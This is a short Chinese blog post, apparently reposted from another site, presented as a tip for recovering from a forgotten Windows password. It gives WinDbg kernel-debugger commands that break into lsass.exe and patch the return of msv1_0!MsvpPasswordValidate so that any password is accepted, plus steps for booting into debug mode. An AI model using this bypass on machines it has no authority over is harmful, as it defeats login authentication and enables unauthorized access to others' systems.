转一个小技巧：利用内核调试器跳过登陆 Windows 时的密码验证_xiaoweitech

查看文章

转一个小技巧：利用内核调试器跳过登陆 Windows 时的密码验证

2008-04-26 10:52

在 http://www.nynaeve.net/?p=136 看到一个小技巧，转过来备份。

忘记了 Windows 密码时可以通过调试方式启动系统，连上内核调试器，在登陆界面处输入下面的命令：

kd> !process 0 0 lsass.exe
PROCESS 81378338 SessionId: 0 Cid: 01ac    Peb: 7ffd4000 ParentCid: 0174
    DirBase: 0acf9000 ObjectTable: e12dd2e8 HandleCount: 411.
    Image: lsass.exe

kd> .process /i 0x81378338
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
8081d97e cc int 3
kd> .reload
kd> ba e1 msv1_0!MsvpPasswordValidate "g @$ra; r @al = 0x1; g"
kd> g

然后用任意密码就可以登陆系统，某些时候很有用。

如果没有设置调试启动项的，在启动时按 F8 键选择调试模式，Window 会缺省使用 COM2 端口，19200 波特率启动系统。Vista 系统上如果有 1394 口，会使用 1394 端口，缺省 channel 为 0。

类别：调试技术 |

| 添加到搜藏 | 分享到i贴吧 | 浏览() | 评论 (2)

姓　名：	*姓名最长为50字节

网址或邮箱：	(选填)

内　容：

验证码：	请点击后输入四位验证码，字母不区分大小写看不清?
	取消回复